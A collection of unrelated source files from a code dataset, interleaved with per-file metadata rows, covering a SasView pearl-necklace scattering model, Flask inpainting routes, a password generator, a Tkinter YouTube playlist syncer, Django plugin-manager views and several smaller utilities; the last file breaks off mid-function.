category = "shape:cylinder"
# ["name", "units", default, [lower, upper], "type","description"],
parameters = [["radius", "Ang", 80.0, [0, inf], "volume",
"Mean radius of the chained spheres"],
["edge_sep", "Ang", 350.0, [0, inf], "volume",
"Mean separation of chained particles"],
["thick_string", "Ang", 2.5, [0, inf], "volume",
"Thickness of the chain linkage"],
["num_pearls", "none", 3, [1, inf], "volume",
"Number of pearls in the necklace (must be integer)"],
["sld", "1e-6/Ang^2", 1.0, [-inf, inf], "sld",
"Scattering length density of the chained spheres"],
["sld_string", "1e-6/Ang^2", 1.0, [-inf, inf], "sld",
"Scattering length density of the chain linkage"],
["sld_solvent", "1e-6/Ang^2", 6.3, [-inf, inf], "sld",
"Scattering length density of the solvent"],
]
source = ["lib/sas_Si.c", "lib/sas_3j1x_x.c", "pearl_necklace.c"]
single = False # use double precision unless told otherwise
def volume(radius, edge_sep, thick_string, num_pearls):
"""
Calculates the total particle volume of the necklace.
Redundant with form_volume.
"""
num_pearls = int(num_pearls + 0.5)
number_of_strings = num_pearls - 1.0
string_vol = edge_sep * pi * pow((thick_string / 2.0), 2.0)
pearl_vol = 4.0 /3.0 * pi * pow(radius, 3.0)
total_vol = number_of_strings * string_vol
total_vol += num_pearls * pearl_vol
return total_vol
def ER(radius, edge_sep, thick_string, num_pearls):
"""
Calculation for effective radius.
"""
num_pearls = int(num_pearls + 0.5)
tot_vol = volume(radius, edge_sep, thick_string, num_pearls)
rad_out = (tot_vol/(4.0/3.0*pi)) ** (1./3.)
return rad_out
# parameters for demo
demo = dict(scale=1, background=0, radius=80.0, edge_sep=350.0,
num_pearls=3, sld=1, sld_solvent=6.3, sld_string=1,
thick_string=2.5,
radius_pd=.2, radius_pd_n=5,
edge_sep_pd=25.0, edge_sep_pd_n=5,
num_pearls_pd=0, num_pearls_pd_n=0,
thick_string_pd=0.2, thick_string_pd_n=5,
)
tests = [[{}, 0.001, 17380.245], [{}, 'ER', 115.39502]]
| 37.346154 | 80 | 0.612976 |
from numpy import inf, pi
name = "pearl_necklace"
title = "Colloidal spheres chained together with no preferential orientation"
description = """
Calculate form factor for Pearl Necklace Model
[Macromol. Symp. 2004, 211, 25-42]
Parameters:
background:background
scale: scale factor
sld: the SLD of the pearl spheres
sld_string: the SLD of the strings
sld_solvent: the SLD of the solvent
num_pearls: number of the pearls
radius: the radius of a pearl
edge_sep: the length of string segment; surface to surface
thick_string: thickness (ie, diameter) of the string
"""
category = "shape:cylinder"
parameters = [["radius", "Ang", 80.0, [0, inf], "volume",
"Mean radius of the chained spheres"],
["edge_sep", "Ang", 350.0, [0, inf], "volume",
"Mean separation of chained particles"],
["thick_string", "Ang", 2.5, [0, inf], "volume",
"Thickness of the chain linkage"],
["num_pearls", "none", 3, [1, inf], "volume",
"Number of pearls in the necklace (must be integer)"],
["sld", "1e-6/Ang^2", 1.0, [-inf, inf], "sld",
"Scattering length density of the chained spheres"],
["sld_string", "1e-6/Ang^2", 1.0, [-inf, inf], "sld",
"Scattering length density of the chain linkage"],
["sld_solvent", "1e-6/Ang^2", 6.3, [-inf, inf], "sld",
"Scattering length density of the solvent"],
]
source = ["lib/sas_Si.c", "lib/sas_3j1x_x.c", "pearl_necklace.c"]
single = False
def volume(radius, edge_sep, thick_string, num_pearls):
num_pearls = int(num_pearls + 0.5)
number_of_strings = num_pearls - 1.0
string_vol = edge_sep * pi * pow((thick_string / 2.0), 2.0)
pearl_vol = 4.0 /3.0 * pi * pow(radius, 3.0)
total_vol = number_of_strings * string_vol
total_vol += num_pearls * pearl_vol
return total_vol
def ER(radius, edge_sep, thick_string, num_pearls):
num_pearls = int(num_pearls + 0.5)
tot_vol = volume(radius, edge_sep, thick_string, num_pearls)
rad_out = (tot_vol/(4.0/3.0*pi)) ** (1./3.)
return rad_out
demo = dict(scale=1, background=0, radius=80.0, edge_sep=350.0,
num_pearls=3, sld=1, sld_solvent=6.3, sld_string=1,
thick_string=2.5,
radius_pd=.2, radius_pd_n=5,
edge_sep_pd=25.0, edge_sep_pd_n=5,
num_pearls_pd=0, num_pearls_pd_n=0,
thick_string_pd=0.2, thick_string_pd_n=5,
)
tests = [[{}, 0.001, 17380.245], [{}, 'ER', 115.39502]]
| true | true |
f719129263fd17bc4e3b23fe0f051e771ce36bbd | 1,835 | py | Python | demo_site/routes.py | ArtemiiH/ppl_eraser_demo_site | 42555a3c74abc434c1ad7ff62cddc822d0a35ce8 | [
"MIT"
] | null | null | null | demo_site/routes.py | ArtemiiH/ppl_eraser_demo_site | 42555a3c74abc434c1ad7ff62cddc822d0a35ce8 | [
"MIT"
] | null | null | null | demo_site/routes.py | ArtemiiH/ppl_eraser_demo_site | 42555a3c74abc434c1ad7ff62cddc822d0a35ce8 | [
"MIT"
] | null | null | null | import urllib
from io import BytesIO
import requests
from flask import (Blueprint, current_app, jsonify, make_response,
render_template, request)
from .helpers import prepare_image_for_json
bp = Blueprint('routes', __name__, url_prefix='')
@bp.route('/', methods=['GET'])
def home():
return render_template('home.html')
@bp.route('/inpaint', methods=['GET', 'POST'])
def inpaint():
if request.method == 'POST':
prepared_image = prepare_image_for_json(request.files['image'])
json = {'image': prepared_image}
url = current_app.config.get('INPAINT_API_URL') + 'api/inpaint'
api_response = requests.post(
url, json=json, timeout=60)
return make_response(jsonify(api_response.json()), 200)
elif request.method == 'GET':
return render_template('inpaint.html')
@bp.route('/cut', methods=['GET', 'POST'])
def cut():
if request.method == 'POST':
prepared_image = prepare_image_for_json(request.files['image'])
json = {'image': prepared_image}
url = current_app.config.get('INPAINT_API_URL') + 'api/cut'
api_response = requests.post(
url, json=json, timeout=60)
return make_response(jsonify(api_response.json()), 200)
elif request.method == 'GET':
return render_template('cut.html')
@bp.route('/mask', methods=['GET', 'POST'])
def mask():
if request.method == 'POST':
prepared_image = prepare_image_for_json(request.files['image'])
json = {'image': prepared_image}
url = current_app.config.get('INPAINT_API_URL') + 'api/mask'
api_response = requests.post(
url, json=json, timeout=60)
return make_response(jsonify(api_response.json()), 200)
elif request.method == 'GET':
return render_template('mask.html')
| 33.363636 | 71 | 0.646866 | import urllib
from io import BytesIO
import requests
from flask import (Blueprint, current_app, jsonify, make_response,
render_template, request)
from .helpers import prepare_image_for_json
bp = Blueprint('routes', __name__, url_prefix='')
@bp.route('/', methods=['GET'])
def home():
return render_template('home.html')
@bp.route('/inpaint', methods=['GET', 'POST'])
def inpaint():
if request.method == 'POST':
prepared_image = prepare_image_for_json(request.files['image'])
json = {'image': prepared_image}
url = current_app.config.get('INPAINT_API_URL') + 'api/inpaint'
api_response = requests.post(
url, json=json, timeout=60)
return make_response(jsonify(api_response.json()), 200)
elif request.method == 'GET':
return render_template('inpaint.html')
@bp.route('/cut', methods=['GET', 'POST'])
def cut():
if request.method == 'POST':
prepared_image = prepare_image_for_json(request.files['image'])
json = {'image': prepared_image}
url = current_app.config.get('INPAINT_API_URL') + 'api/cut'
api_response = requests.post(
url, json=json, timeout=60)
return make_response(jsonify(api_response.json()), 200)
elif request.method == 'GET':
return render_template('cut.html')
@bp.route('/mask', methods=['GET', 'POST'])
def mask():
if request.method == 'POST':
prepared_image = prepare_image_for_json(request.files['image'])
json = {'image': prepared_image}
url = current_app.config.get('INPAINT_API_URL') + 'api/mask'
api_response = requests.post(
url, json=json, timeout=60)
return make_response(jsonify(api_response.json()), 200)
elif request.method == 'GET':
return render_template('mask.html')
| true | true |
f719132b31b09ec071c7f06ba0c074e2c1965b39 | 560 | py | Python | password generator.py | JoseRoberto1506/Password-generator | 47045b6a2de4dd609874dfce0077e9e30ac5cade | [
"MIT"
] | null | null | null | password generator.py | JoseRoberto1506/Password-generator | 47045b6a2de4dd609874dfce0077e9e30ac5cade | [
"MIT"
] | null | null | null | password generator.py | JoseRoberto1506/Password-generator | 47045b6a2de4dd609874dfce0077e9e30ac5cade | [
"MIT"
] | null | null | null | from string import ascii_letters, digits
from secrets import choice
lenght = int(input("Você deseja uma senha de quantos caracteres? "))
special_characters = "!#$%&()*+,-./:;<=>?@[\]_{|}."
characters = ascii_letters + special_characters + digits
while True:
password = ''.join(choice(characters) for i in range (lenght))
if (any(c.islower() for c in password) and
any(c.isupper() for c in password) and
any(c.isdigit() for c in password) and
any(sc in special_characters for sc in password)):
break
print(password)
| 32.941176 | 68 | 0.666071 | from string import ascii_letters, digits
from secrets import choice
lenght = int(input("Você deseja uma senha de quantos caracteres? "))
special_characters = "!#$%&()*+,-./:;<=>?@[\]_{|}."
characters = ascii_letters + special_characters + digits
while True:
password = ''.join(choice(characters) for i in range (lenght))
if (any(c.islower() for c in password) and
any(c.isupper() for c in password) and
any(c.isdigit() for c in password) and
any(sc in special_characters for sc in password)):
break
print(password)
| true | true |
f71913c1c96aa7dfd421ab759af0daac0e1f61ed | 1,109 | py | Python | mono2micro/ebc-application/ebc-data_dependencies/dynamic_dependencies/order_dependencies.py | jahn18/Normalized-TurboMQ | f44d85dca15d86a82e15b083072e05698135e479 | [
"MIT"
] | null | null | null | mono2micro/ebc-application/ebc-data_dependencies/dynamic_dependencies/order_dependencies.py | jahn18/Normalized-TurboMQ | f44d85dca15d86a82e15b083072e05698135e479 | [
"MIT"
] | null | null | null | mono2micro/ebc-application/ebc-data_dependencies/dynamic_dependencies/order_dependencies.py | jahn18/Normalized-TurboMQ | f44d85dca15d86a82e15b083072e05698135e479 | [
"MIT"
] | null | null | null | import csv
import sys
def orderEdges(fileName):
dynamic_dependencies_file = open(fileName)
csv_reader = csv.reader(dynamic_dependencies_file)
list_of_edges = []
for row in csv_reader:
list_of_edges.append(row[0].split())
sortedList = insertionSort(list_of_edges)
return sortedList
def writeCSV(sortedList, fileName):
with open(fileName, "w") as f:
writer = csv.writer(f)
writer.writerows(sortedList)
def insertionSort(list_of_values):
for i in range(len(list_of_values)):
j = findMin(i, list_of_values)
list_of_values[i], list_of_values[j] = list_of_values[j], list_of_values[i]
return list_of_values
def findMin(i, list_of_values):
smallest_value = int(list_of_values[i][2])
index = i
for j in range(i, len(list_of_values)):
if int(list_of_values[j][2]) < smallest_value:
index = j
smallest_value = int(list_of_values[j][2])
return index
if __name__ == "__main__":
fileName = sys.argv[1]
sortedList = orderEdges(fileName)
writeCSV(sortedList, 'sorted_edges.csv')
| 29.972973 | 83 | 0.680794 | import csv
import sys
def orderEdges(fileName):
dynamic_dependencies_file = open(fileName)
csv_reader = csv.reader(dynamic_dependencies_file)
list_of_edges = []
for row in csv_reader:
list_of_edges.append(row[0].split())
sortedList = insertionSort(list_of_edges)
return sortedList
def writeCSV(sortedList, fileName):
with open(fileName, "w") as f:
writer = csv.writer(f)
writer.writerows(sortedList)
def insertionSort(list_of_values):
for i in range(len(list_of_values)):
j = findMin(i, list_of_values)
list_of_values[i], list_of_values[j] = list_of_values[j], list_of_values[i]
return list_of_values
def findMin(i, list_of_values):
smallest_value = int(list_of_values[i][2])
index = i
for j in range(i, len(list_of_values)):
if int(list_of_values[j][2]) < smallest_value:
index = j
smallest_value = int(list_of_values[j][2])
return index
if __name__ == "__main__":
fileName = sys.argv[1]
sortedList = orderEdges(fileName)
writeCSV(sortedList, 'sorted_edges.csv')
| true | true |
f719145474888494e028913c2c5ae60602cf70ac | 1,826 | py | Python | azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/application_gateway_ssl_predefined_policy.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 1 | 2022-03-30T22:39:15.000Z | 2022-03-30T22:39:15.000Z | azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/application_gateway_ssl_predefined_policy.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 54 | 2016-03-25T17:25:01.000Z | 2018-10-22T17:27:54.000Z | azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/application_gateway_ssl_predefined_policy.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 2 | 2017-01-20T18:25:46.000Z | 2017-05-12T21:31:47.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewaySslPredefinedPolicy(SubResource):
"""An Ssl predefined policy.
:param id: Resource ID.
:type id: str
:param name: Name of Ssl predefined policy.
:type name: str
:param cipher_suites: Ssl cipher suites to be enabled in the specified
order for application gateway.
:type cipher_suites: list[str or
~azure.mgmt.network.v2018_01_01.models.ApplicationGatewaySslCipherSuite]
:param min_protocol_version: Minimum version of Ssl protocol to be
supported on application gateway. Possible values include: 'TLSv1_0',
'TLSv1_1', 'TLSv1_2'
:type min_protocol_version: str or
~azure.mgmt.network.v2018_01_01.models.ApplicationGatewaySslProtocol
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'cipher_suites': {'key': 'properties.cipherSuites', 'type': '[str]'},
'min_protocol_version': {'key': 'properties.minProtocolVersion', 'type': 'str'},
}
def __init__(self, **kwargs):
super(ApplicationGatewaySslPredefinedPolicy, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.cipher_suites = kwargs.get('cipher_suites', None)
self.min_protocol_version = kwargs.get('min_protocol_version', None)
| 40.577778 | 88 | 0.64184 |
from .sub_resource import SubResource
class ApplicationGatewaySslPredefinedPolicy(SubResource):
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'cipher_suites': {'key': 'properties.cipherSuites', 'type': '[str]'},
'min_protocol_version': {'key': 'properties.minProtocolVersion', 'type': 'str'},
}
def __init__(self, **kwargs):
super(ApplicationGatewaySslPredefinedPolicy, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.cipher_suites = kwargs.get('cipher_suites', None)
self.min_protocol_version = kwargs.get('min_protocol_version', None)
| true | true |
f71914c4aecc58a1fc572531f55a0757d52c5800 | 3,271 | py | Python | youtube_synchronizer/interfaces/youtube-playlist-synchronizer.py | entangledcognition/youtube-playlist-syncronizer | ff4bc8b0e49a2b51194405731dc3c4b5cf7b3ce8 | [
"MIT"
] | 1 | 2020-01-26T01:31:08.000Z | 2020-01-26T01:31:08.000Z | youtube_synchronizer/interfaces/youtube-playlist-synchronizer.py | entangledcognition/youtube-playlist-syncronizer | ff4bc8b0e49a2b51194405731dc3c4b5cf7b3ce8 | [
"MIT"
] | 1 | 2020-01-26T01:38:48.000Z | 2020-01-26T01:38:48.000Z | youtube_synchronizer/interfaces/youtube-playlist-synchronizer.py | bharathmuppa/youtube-playlist-syncronizer | ff4bc8b0e49a2b51194405731dc3c4b5cf7b3ce8 | [
"MIT"
] | null | null | null | from PIL import Image, ImageTk
from tkinter import Tk, Text, BOTH, W, N, E, S,filedialog,messagebox
from tkinter.ttk import Frame, Button, Label, Style, Progressbar
from youtube_synchronizer.utils import createFolderForPlaylist
from youtube_synchronizer.dataconnectors.youtube_login import loginToGoogle
class YoutubeFrame(Frame):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.master.title("Youtube Synchronizer")
self.pack(fill=BOTH, expand=True)
# self.columnconfigure(1, weight=1)
self.rowconfigure(3, weight=1)
self.rowconfigure(5, pad=1)
lbl = Label(self, text="Welcome to Youtube playlist Synchronizer")
lbl.grid(sticky=W, pady=4, padx=5)
bar = Progressbar(self, length=200, style='black.Horizontal.TProgressbar')
# img = Image.open("icon.png")
# img = img.resize((300, 300), Image.ANTIALIAS)
# ytpl = ImageTk.PhotoImage(img)
# area = Label(self, image=ytpl)
# area.image = ytpl
self.logArea = Text(self,state="disabled")
self.logArea.grid(row=1, column=0, columnspan=3, rowspan=4,
padx=5, sticky=E+W+S+N)
self.appendLog("Steps to follow \n")
self.appendLog("1) Select root directory \n ")
self.appendLog("2) Give permission for google to get playlist automatically \n")
self.appendLog("3) start syncing into your selected folder\n")
cbtn = Button(self, text="Choose Directory", command=lambda: self.chooseRootDirectory(cbtn))
cbtn.grid(row=5, column=0, pady=2)
hbtn = Button(self, text="Google Permission", command=lambda: self.clicked(hbtn))
hbtn.grid(row=5, column=1, padx=2)
obtn = Button(self, text="Start Sync", command=self.startSyncing)
obtn.grid(row=5, column=3)
def clicked(self,event):
googlePermissionUrl = loginToGoogle()
event.grid_forget()
label = Label(self, text="Google Permissions Granted")
label.grid(row=5, column=1, pady=2)
self.appendLog("Thanks for granting Google Permission")
def chooseRootDirectory(self,event):
self.rootDirectory = filedialog.askdirectory()
event.grid_forget()
label = Label(self, text=self.rootDirectory)
label.grid(row=5, column=0, pady=2)
self.appendLog("You have selected "+ self.rootDirectory +" as your root directory")
def appendLog(self,text):
self.logArea.configure(state='normal')
self.logArea.insert('end', text+'\n')
self.logArea.configure(state='disabled')
def startSyncing(self):
self.response = messagebox.askquestion("Confirmation", "you have selected: " + self.rootDirectory +
" as root Directory and youtube playlist will be added as sub folders inside " + self.rootDirectory + "/, are you sure?")
if self.response == 'yes':
createFolderForPlaylist(self.rootDirectory)
else:
self.appendLog("Playlist synchronized successfully")
def main():
root = Tk()
app = YoutubeFrame()
root.mainloop()
if __name__ == '__main__':
main()
| 37.170455 | 168 | 0.634668 | from PIL import Image, ImageTk
from tkinter import Tk, Text, BOTH, W, N, E, S,filedialog,messagebox
from tkinter.ttk import Frame, Button, Label, Style, Progressbar
from youtube_synchronizer.utils import createFolderForPlaylist
from youtube_synchronizer.dataconnectors.youtube_login import loginToGoogle
class YoutubeFrame(Frame):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.master.title("Youtube Synchronizer")
self.pack(fill=BOTH, expand=True)
self.rowconfigure(3, weight=1)
self.rowconfigure(5, pad=1)
lbl = Label(self, text="Welcome to Youtube playlist Synchronizer")
lbl.grid(sticky=W, pady=4, padx=5)
bar = Progressbar(self, length=200, style='black.Horizontal.TProgressbar')
self.logArea = Text(self,state="disabled")
self.logArea.grid(row=1, column=0, columnspan=3, rowspan=4,
padx=5, sticky=E+W+S+N)
self.appendLog("Steps to follow \n")
self.appendLog("1) Select root directory \n ")
self.appendLog("2) Give permission for google to get playlist automatically \n")
self.appendLog("3) start syncing into your selected folder\n")
cbtn = Button(self, text="Choose Directory", command=lambda: self.chooseRootDirectory(cbtn))
cbtn.grid(row=5, column=0, pady=2)
hbtn = Button(self, text="Google Permission", command=lambda: self.clicked(hbtn))
hbtn.grid(row=5, column=1, padx=2)
obtn = Button(self, text="Start Sync", command=self.startSyncing)
obtn.grid(row=5, column=3)
def clicked(self,event):
googlePermissionUrl = loginToGoogle()
event.grid_forget()
label = Label(self, text="Google Permissions Granted")
label.grid(row=5, column=1, pady=2)
self.appendLog("Thanks for granting Google Permission")
def chooseRootDirectory(self,event):
self.rootDirectory = filedialog.askdirectory()
event.grid_forget()
label = Label(self, text=self.rootDirectory)
label.grid(row=5, column=0, pady=2)
self.appendLog("You have selected "+ self.rootDirectory +" as your root directory")
def appendLog(self,text):
self.logArea.configure(state='normal')
self.logArea.insert('end', text+'\n')
self.logArea.configure(state='disabled')
def startSyncing(self):
self.response = messagebox.askquestion("Confirmation", "you have selected: " + self.rootDirectory +
" as root Directory and youtube playlist will be added as sub folders inside " + self.rootDirectory + "/, are you sure?")
if self.response == 'yes':
createFolderForPlaylist(self.rootDirectory)
else:
self.appendLog("Playlist synchronized successfully")
def main():
root = Tk()
app = YoutubeFrame()
root.mainloop()
if __name__ == '__main__':
main()
| true | true |
f71914f55a893db82056922f6a48c469c030a16d | 559 | py | Python | libs/sync_bn/src/__init__.py | hx-Tang/GANet | 8935c9d3d82189fa6f940c2a877534a398a041e4 | [
"MIT"
] | 497 | 2019-04-16T02:43:06.000Z | 2022-03-13T10:26:12.000Z | libs/sync_bn/src/__init__.py | hx-Tang/GANet | 8935c9d3d82189fa6f940c2a877534a398a041e4 | [
"MIT"
] | 103 | 2019-04-18T07:28:58.000Z | 2021-12-22T08:45:16.000Z | libs/sync_bn/src/__init__.py | hx-Tang/GANet | 8935c9d3d82189fa6f940c2a877534a398a041e4 | [
"MIT"
] | 146 | 2019-04-22T13:39:41.000Z | 2022-03-26T03:32:42.000Z | import os
import torch
from torch.utils.cpp_extension import load
cwd = os.path.dirname(os.path.realpath(__file__))
cpu_path = os.path.join(cwd, 'cpu')
gpu_path = os.path.join(cwd, 'gpu')
cpu = load('sync_bn_cpu', [
os.path.join(cpu_path, 'operator.cpp'),
os.path.join(cpu_path, 'sync_bn.cpp'),
], build_directory=cpu_path, verbose=False)
if torch.cuda.is_available():
gpu = load('sync_bn_gpu', [
os.path.join(gpu_path, 'operator.cpp'),
os.path.join(gpu_path, 'sync_bn_cuda.cu'),
], build_directory=gpu_path, verbose=False)
| 29.421053 | 50 | 0.695886 | import os
import torch
from torch.utils.cpp_extension import load
cwd = os.path.dirname(os.path.realpath(__file__))
cpu_path = os.path.join(cwd, 'cpu')
gpu_path = os.path.join(cwd, 'gpu')
cpu = load('sync_bn_cpu', [
os.path.join(cpu_path, 'operator.cpp'),
os.path.join(cpu_path, 'sync_bn.cpp'),
], build_directory=cpu_path, verbose=False)
if torch.cuda.is_available():
gpu = load('sync_bn_gpu', [
os.path.join(gpu_path, 'operator.cpp'),
os.path.join(gpu_path, 'sync_bn_cuda.cu'),
], build_directory=gpu_path, verbose=False)
| true | true |
f719157c0ed0ea389406cf401792444090c08f94 | 725 | py | Python | tests/utils/test_utils_django.py | bitcaster-io/bitcaster | 9f1bad96e00e3bc78a22451731e231d30662b166 | [
"BSD-3-Clause"
] | 4 | 2018-03-01T10:22:30.000Z | 2020-04-04T16:31:11.000Z | tests/utils/test_utils_django.py | bitcaster-io/bitcaster | 9f1bad96e00e3bc78a22451731e231d30662b166 | [
"BSD-3-Clause"
] | 60 | 2018-05-20T04:42:32.000Z | 2022-02-10T17:03:37.000Z | tests/utils/test_utils_django.py | bitcaster-io/bitcaster | 9f1bad96e00e3bc78a22451731e231d30662b166 | [
"BSD-3-Clause"
] | 1 | 2018-08-04T05:06:45.000Z | 2018-08-04T05:06:45.000Z | from unittest import mock
from unittest.mock import Mock
from bitcaster.utils.django import (activator_factory,
deactivator_factory, toggler_factory,)
def test_toggler_factory():
with mock.patch('bitcaster.utils.django.get_connection'):
func = toggler_factory('test')
assert func(Mock(), Mock(), Mock())
def test_activator_factory():
with mock.patch('bitcaster.utils.django.get_connection'):
func = activator_factory('test')
assert func(Mock(), Mock(), Mock())
def test_deactivator_factory():
with mock.patch('bitcaster.utils.django.get_connection'):
func = deactivator_factory('test')
assert func(Mock(), Mock(), Mock())
| 30.208333 | 74 | 0.670345 | from unittest import mock
from unittest.mock import Mock
from bitcaster.utils.django import (activator_factory,
deactivator_factory, toggler_factory,)
def test_toggler_factory():
with mock.patch('bitcaster.utils.django.get_connection'):
func = toggler_factory('test')
assert func(Mock(), Mock(), Mock())
def test_activator_factory():
with mock.patch('bitcaster.utils.django.get_connection'):
func = activator_factory('test')
assert func(Mock(), Mock(), Mock())
def test_deactivator_factory():
with mock.patch('bitcaster.utils.django.get_connection'):
func = deactivator_factory('test')
assert func(Mock(), Mock(), Mock())
| true | true |
f719162b3d3e8d2a126762c598211bece33424a9 | 334 | py | Python | experiments/jacobi-1d/tmp_files/4223.py | LoopTilingBenchmark/benchmark | 52a3d2e70216552a498fd91de02a2fa9cb62122c | [
"BSD-2-Clause"
] | null | null | null | experiments/jacobi-1d/tmp_files/4223.py | LoopTilingBenchmark/benchmark | 52a3d2e70216552a498fd91de02a2fa9cb62122c | [
"BSD-2-Clause"
] | null | null | null | experiments/jacobi-1d/tmp_files/4223.py | LoopTilingBenchmark/benchmark | 52a3d2e70216552a498fd91de02a2fa9cb62122c | [
"BSD-2-Clause"
] | null | null | null | from chill import *
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/jacobi-1d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/jacobi-1d/tmp_files/4223.c')
procedure('kernel_jacobi_1d')
loop(0)
known(' n > 2 ')
tile(0,2,8,2)
tile(1,2,8,2)
| 30.363636 | 118 | 0.763473 | from chill import *
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/jacobi-1d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/jacobi-1d/tmp_files/4223.c')
procedure('kernel_jacobi_1d')
loop(0)
known(' n > 2 ')
tile(0,2,8,2)
tile(1,2,8,2)
| true | true |
f71916c16a3387a714ba74da62f20782e4f9fe3d | 7,539 | py | Python | core/views.py | ICFL-UP/Yrden | 88c421f1b391e9a6943455b05b8f397e9023187b | [
"MIT"
] | null | null | null | core/views.py | ICFL-UP/Yrden | 88c421f1b391e9a6943455b05b8f397e9023187b | [
"MIT"
] | 6 | 2022-02-16T06:08:43.000Z | 2022-02-16T06:08:55.000Z | core/views.py | ICFL-UP/Yrden | 88c421f1b391e9a6943455b05b8f397e9023187b | [
"MIT"
] | null | null | null | import logging
import os
import json
import shutil
import threading
from typing import Any, List
from django.contrib.auth import login
from django.forms.models import BaseModelForm
from django.http.request import HttpRequest
from django.http.response import HttpResponse
from django.views.generic import ListView, DetailView, CreateView
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.urls import reverse_lazy
from django.views.generic.edit import DeleteView
from django.shortcuts import redirect, render
from django.urls import reverse
from django.utils import timezone
from datetime import datetime
from django.contrib.auth.mixins import LoginRequiredMixin
from core.utils import build_zip_json, create_venv, extract_zip, get_python_choices, write_log
from core.models import Plugin, PluginRun
from core.forms import NewUserForm, PluginFormSet, PluginSourceForm
from core.enums.log_type_enum import LogType
logging.basicConfig(level=logging.DEBUG,
format='[%(levelname)s] (%(threadName)-9s) %(message)s',)
def register_request(request: HttpRequest):
if request.method == "POST":
form = NewUserForm(request.POST)
if form.is_valid():
user = form.save()
login(request, user)
return redirect(reverse("core:index"))
form = NewUserForm()
return render(request=request, template_name="registration/register.html", context={"register_form":form})
class PluginIndexView(LoginRequiredMixin, ListView):
model = Plugin
template_name = 'core/index.html'
context_object_name = 'plugins'
paginate_by = 5
def get_context_data(self, **kwargs):
context = super(PluginIndexView, self).get_context_data(**kwargs)
plugins = self.get_queryset()
page = self.request.GET.get('page')
paginator = Paginator(plugins, self.paginate_by)
try:
plugins = paginator.page(page)
except PageNotAnInteger:
plugins = paginator.page(1)
except EmptyPage:
plugins = paginator.page(paginator.num_pages)
context['plugins'] = plugins
return context
class PluginDetailView(LoginRequiredMixin, DetailView):
model = Plugin
template_name = 'core/plugin_detail.html'
context_object_name = 'plugin'
paginate_by = 5
def get_context_data(self, **kwargs):
context = super(PluginDetailView, self).get_context_data(**kwargs)
plugin_runs = PluginRun.objects.filter(plugin=self.kwargs['pk'])
page = self.request.GET.get('page')
paginator = Paginator(plugin_runs, self.paginate_by)
try:
plugin_runs = paginator.page(page)
except PageNotAnInteger:
plugin_runs = paginator.page(1)
except EmptyPage:
plugin_runs = paginator.page(paginator.num_pages)
context['plugin_runs'] = plugin_runs
return context
class PluginCreateView(LoginRequiredMixin, CreateView):
form_class = PluginSourceForm
template_name = 'core/plugin_create_form.html'
success_url = reverse_lazy('core:index')
def get_context_data(self, **kwargs):
context = super(PluginCreateView, self).get_context_data(**kwargs)
context['plugin_formset'] = PluginFormSet()
return context
def post(self, request, *args, **kwargs):
self.object = None
form_class = self.get_form_class()
form = self.get_form(form_class)
plugin_formset = PluginFormSet(self.request.POST)
if form.is_valid() and plugin_formset.is_valid():
return self.form_valid(form, plugin_formset, request.user)
else:
return self.form_invalid(form, plugin_formset)
def form_valid(self, form: BaseModelForm, plugin_formset: PluginFormSet, user):
# save PluginSource
self.object = form.save(commit=False)
self.object.source_dest = form.cleaned_data['source_dest']
self.object.source_hash = form.cleaned_data['source_hash']
self.object.upload_time = form.cleaned_data['upload_time']
self.object.upload_user = user
self.object.save()
build_hash_thread = threading.Thread(
target=build_zip_json, args=(form.cleaned_data['plugin_zip_file'].file, self.object))
build_hash_thread.start()
log_json: dict = {
'log_datetime': datetime.timestamp(timezone.now()),
'source_dest': self.object.source_dest,
'source_hash': self.object.source_hash,
'upload_time': self.object.upload_time.strftime("%m/%d/%Y, %H:%M:%S"),
'upload_user_username': self.object.upload_user.username,
'upload_user_email': self.object.upload_user.email,
}
write_log(LogType.CREATE, self.object, log_json)
# save Plugin
plugin: List[Plugin] = plugin_formset.save(commit=False)
plugin[0].plugin_source = self.object
plugin[0].python_version = plugin_formset.cleaned_data[0]['python_version']
plugin[0].plugin_dest = 'core' + os.sep + \
'plugin' + os.sep + self.object.source_hash + '_' + \
str(datetime.timestamp(self.object.upload_time))
extract_zip_thread = threading.Thread(target=extract_zip, args=(
form.cleaned_data['plugin_zip_file'], plugin[0].plugin_dest))
extract_zip_thread.start()
plugin[0].save()
extract_zip_thread.join()
venv_thread = threading.Thread(target=create_venv, args=(plugin[0], ))
venv_thread.start()
return redirect(reverse("core:index"))
def form_invalid(self, form, plugin_formset):
return self.render_to_response(
self.get_context_data(form=form,
product_meta_formset=plugin_formset
)
)
class PluginDeleteView(LoginRequiredMixin, DeleteView):
model = Plugin
template_name = 'core/plugin_delete.html'
success_url = reverse_lazy('core:index')
def delete(self, request: HttpRequest, *args: str, **kwargs: Any) -> HttpResponse:
object: Plugin = self.get_object()
user = request.user
source_dest = object.plugin_source.source_dest
shutil.rmtree(object.plugin_dest)
deleted_time = timezone.now()
